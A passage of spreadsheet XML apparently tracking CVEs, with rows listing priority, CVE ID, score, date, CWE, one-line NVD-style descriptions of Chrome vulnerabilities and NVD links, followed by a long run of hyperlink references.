      <c r="K6121" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L6121" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in DevTools in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to obtain cross-origin data via a crafted Chrome extension. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="M6121" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87511</t>
        </is>
      </c>
    </row>
    <row r="6122">
      <c r="A6122" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6122" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87595</t>
        </is>
      </c>
      <c r="C6122" s="5" t="inlineStr"/>
      <c r="D6122" s="5" t="inlineStr"/>
      <c r="E6122" s="5" t="inlineStr"/>
      <c r="F6122" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G6122" s="5" t="inlineStr"/>
      <c r="H6122" s="5" t="inlineStr"/>
      <c r="I6122" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J6122" s="5" t="inlineStr"/>
      <c r="K6122" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L6122" s="5" t="inlineStr">
        <is>
          <t>Server-side request forgery in Mobile in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="M6122" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87595</t>
        </is>
      </c>
    </row>
    <row r="6123">
      <c r="A6123" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6123" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87608</t>
        </is>
      </c>
      <c r="C6123" s="5" t="inlineStr"/>
      <c r="D6123" s="5" t="inlineStr"/>
      <c r="E6123" s="5" t="inlineStr"/>
      <c r="F6123" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G6123" s="5" t="inlineStr"/>
      <c r="H6123" s="5" t="inlineStr"/>
      <c r="I6123" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J6123" s="5" t="inlineStr"/>
      <c r="K6123" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L6123" s="5" t="inlineStr">
        <is>
          <t>Improper certificate validation in FedCM in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to bypass web origin policy via crafted network traffic. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="M6123" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87608</t>
        </is>
      </c>
    </row>
    <row r="6124">
      <c r="A6124" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6124" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87627</t>
        </is>
      </c>
      <c r="C6124" s="5" t="inlineStr"/>
      <c r="D6124" s="5" t="inlineStr"/>
      <c r="E6124" s="5" t="inlineStr"/>
      <c r="F6124" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G6124" s="5" t="inlineStr"/>
      <c r="H6124" s="5" t="inlineStr"/>
      <c r="I6124" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J6124" s="5" t="inlineStr"/>
      <c r="K6124" s="5" t="inlineStr">
        <is>
          <t>CWE-436</t>
        </is>
      </c>
      <c r="L6124" s="5" t="inlineStr">
        <is>
          <t>Interpretation conflict in Safebrowsing in Google Chrome on on Mac prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to bypass system access restrictions via a crafted file. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="M6124" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87627</t>
        </is>
      </c>
    </row>
    <row r="6125">
      <c r="A6125" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6125" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87804</t>
        </is>
      </c>
      <c r="C6125" s="5" t="inlineStr"/>
      <c r="D6125" s="5" t="inlineStr"/>
      <c r="E6125" s="5" t="inlineStr"/>
      <c r="F6125" s="5" t="inlineStr"/>
      <c r="G6125" s="5" t="inlineStr"/>
      <c r="H6125" s="5" t="inlineStr"/>
      <c r="I6125" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J6125" s="5" t="inlineStr"/>
      <c r="K6125" s="5" t="inlineStr"/>
      <c r="L6125" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: no security impact</t>
        </is>
      </c>
      <c r="M6125" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87804</t>
        </is>
      </c>
    </row>
    <row r="6126">
      <c r="A6126" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6126" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9768</t>
        </is>
      </c>
      <c r="C6126" s="5" t="inlineStr"/>
      <c r="D6126" s="5" t="inlineStr"/>
      <c r="E6126" s="5" t="inlineStr"/>
      <c r="F6126" s="5" t="inlineStr"/>
      <c r="G6126" s="5" t="inlineStr"/>
      <c r="H6126" s="5" t="inlineStr"/>
      <c r="I6126" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J6126" s="5" t="inlineStr"/>
      <c r="K6126" s="5" t="inlineStr"/>
      <c r="L6126" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="M6126" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9768</t>
        </is>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:M6126"/>
  <conditionalFormatting sqref="D2:D612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6126">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 xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1570" r:id="rId1569"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1571" r:id="rId1570"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1572" r:id="rId1571"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1573" r:id="rId1572"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1574" r:id="rId1573"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1575" r:id="rId1574"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1576" r:id="rId1575"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1577" r:id="rId1576"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1578" r:id="rId1577"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1579" r:id="rId1578"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1580" r:id="rId1579"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1581" r:id="rId1580"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1582" r:id="rId1581"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1583" r:id="rId1582"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1584" r:id="rId1583"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1585" r:id="rId1584"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1586" r:id="rId1585"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1587" r:id="rId1586"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1588" r:id="rId1587"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1589" r:id="rId1588"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1590" r:id="rId1589"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1591" r:id="rId1590"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1592" r:id="rId1591"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1593" r:id="rId1592"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1594" r:id="rId1593"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1595" r:id="rId1594"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1596" r:id="rId1595"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1597" r:id="rId1596"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1598" r:id="rId1597"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1599" r:id="rId1598"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1600" r:id="rId1599"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1601" r:id="rId1600"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1602" r:id="rId1601"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1603" r:id="rId1602"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1604" r:id="rId1603"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1605" r:id="rId1604"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1606" r:id="rId1605"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1607" r:id="rId1606"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1608" r:id="rId1607"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1609" r:id="rId1608"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1610" r:id="rId1609"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1611" r:id="rId1610"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1612" r:id="rId1611"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1613" r:id="rId1612"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1614" r:id="rId1613"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1615" r:id="rId1614"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1616" r:id="rId1615"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1617" r:id="rId1616"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1618" r:id="rId1617"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1619" r:id="rId1618"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1620" r:id="rId1619"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1621" r:id="rId1620"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1622" r:id="rId1621"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1623" r:id="rId1622"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1624" r:id="rId1623"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1625" r:id="rId1624"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1626" r:id="rId1625"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1627" r:id="rId1626"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1628" r:id="rId1627"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1629" r:id="rId1628"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1630" r:id="rId1629"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1631" r:id="rId1630"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1632" r:id="rId1631"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1633" r:id="rId1632"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1634" r:id="rId1633"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1635" r:id="rId1634"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1636" r:id="rId1635"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1637" r:id="rId1636"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1638" r:id="rId1637"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1639" r:id="rId1638"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1640" r:id="rId1639"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1641" r:id="rId1640"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1642" r:id="rId1641"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1643" r:id="rId1642"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1644" r:id="rId1643"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1645" r:id="rId1644"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1646" r:id="rId1645"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1647" r:id="rId1646"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1648" r:id="rId1647"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1649" r:id="rId1648"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1650" r:id="rId1649"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1651" r:id="rId1650"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1652" r:id="rId1651"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1653" r:id="rId1652"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1654" r:id="rId1653"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1655" r:id="rId1654"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1656" r:id="rId1655"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1657" r:id="rId1656"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1658" r:id="rId1657"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1659" r:id="rId1658"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1660" r:id="rId1659"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1661" r:id="rId1660"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1662" r:id="rId1661"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1663" r:id="rId1662"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1664" r:id="rId1663"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1665" r:id="rId1664"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1666" r:id="rId1665"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1667" r:id="rId1666"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1668" r:id="rId1667"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1669" r:id="rId1668"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1670" r:id="rId1669"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1671" r:id="rId1670"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1672" r:id="rId1671"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1673" r:id="rId1672"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1674" r:id="rId1673"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1675" r:id="rId1674"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1676" r:id="rId1675"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1677" r:id="rId1676"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1678" r:id="rId1677"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1679" r:id="rId1678"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1680" r:id="rId1679"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1681" r:id="rId1680"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1682" r:id="rId1681"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1683" r:id="rId1682"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1684" r:id="rId1683"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1685" r:id="rId1684"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1686" r:id="rId1685"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1687" r:id="rId1686"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1688" r:id="rId1687"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1689" r:id="rId1688"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1690" r:id="rId1689"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1691" r:id="rId1690"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1692" r:id="rId1691"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1693" r:id="rId1692"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1694" r:id="rId1693"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1695" r:id="rId1694"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1696" r:id="rId1695"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1697" r:id="rId1696"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1698" r:id="rId1697"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1699" r:id="rId1698"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1700" r:id="rId1699"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1701" r:id="rId1700"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1702" r:id="rId1701"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1703" r:id="rId1702"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1704" r:id="rId1703"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1705" r:id="rId1704"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1706" r:id="rId1705"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1707" r:id="rId1706"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1708" r:id="rId1707"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1709" r:id="rId1708"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1710" r:id="rId1709"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1711" r:id="rId1710"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1712" r:id="rId1711"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1713" r:id="rId1712"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1714" r:id="rId1713"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1715" r:id="rId1714"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1716" r:id="rId1715"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1717" r:id="rId1716"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1718" r:id="rId1717"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1719" r:id="rId1718"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1720" r:id="rId1719"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1721" r:id="rId1720"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1722" r:id="rId1721"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1723" r:id="rId1722"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1724" r:id="rId1723"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1725" r:id="rId1724"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1726" r:id="rId1725"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1727" r:id="rId1726"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1728" r:id="rId1727"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1729" r:id="rId1728"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1730" r:id="rId1729"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1731" r:id="rId1730"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1732" r:id="rId1731"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1733" r:id="rId1732"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1734" r:id="rId1733"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1735" r:id="rId1734"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1736" r:id="rId1735"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1737" r:id="rId1736"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1738" r:id="rId1737"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1739" r:id="rId1738"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1740" r:id="rId1739"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1741" r:id="rId1740"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1742" r:id="rId1741"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1743" r:id="rId1742"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1744" r:id="rId1743"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1745" r:id="rId1744"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1746" r:id="rId1745"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1747" r:id="rId1746"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1748" r:id="rId1747"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1749" r:id="rId1748"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1750" r:id="rId1749"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1751" r:id="rId1750"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1752" r:id="rId1751"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1753" r:id="rId1752"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1754" r:id="rId1753"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1755" r:id="rId1754"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1756" r:id="rId1755"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1757" r:id="rId1756"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1758" r:id="rId1757"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1759" r:id="rId1758"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1760" r:id="rId1759"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1761" r:id="rId1760"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1762" r:id="rId1761"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1763" r:id="rId1762"/>
